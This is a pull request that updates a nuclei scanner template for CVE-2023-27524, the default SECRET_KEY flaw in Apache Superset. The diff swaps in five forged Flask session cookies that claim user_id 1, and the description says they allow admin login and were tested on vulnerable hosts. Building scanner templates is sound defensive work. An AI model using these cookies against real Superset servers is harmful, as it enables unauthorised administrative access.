### PR TITLE
Update CVE-2023-27524.yaml

### DIFF
--- a/http/cves/2023/CVE-2023-27524.yaml
+++ b/http/cves/2023/CVE-2023-27524.yaml
@@ -40,11 +40,11 @@ http:
         - '10'
 
       session:
-        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.RoFeMf1WLNJXDYslf18x9VGxC0Q'
-        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hKV8XXVcD6lWhTIoWs0CjrSRPQQ'
-        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.xtJXBhmJ0k6_oKs8iGhWJK2BjKs'
-        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.hRZP41FgqxjaxjJ3WyeIVxyZDng'
-        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEjVxg.6GpaUB9IP9OnG3HHon3XcdzHWhI'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY'
+        - 'eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U'
     attack: clusterbomb
 
     stop-at-first-match: true


### PR DESCRIPTION
### Template / PR Information

This vulnerability lays in the standard SECRET_KEY, with this secret key you can forge your own cookies to login as an admin. The only problem with the original script is that most of the cookies don't work. I've changed these cookies with this PR so that they work. I've added a screenshot where nuclei_yaml includes my cookies and org_nulei.yaml is the original script, I've tested this on a few vulnerable hosts and as you can see in the screenshots it has more hits.

- Updated CVE-2023-27524 with right cookies
- References: https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

![ss](https://github.com/projectdiscovery/nuclei-templates/assets/57531297/d2de45e5-564c-494a-bf61-7b787cc37a83)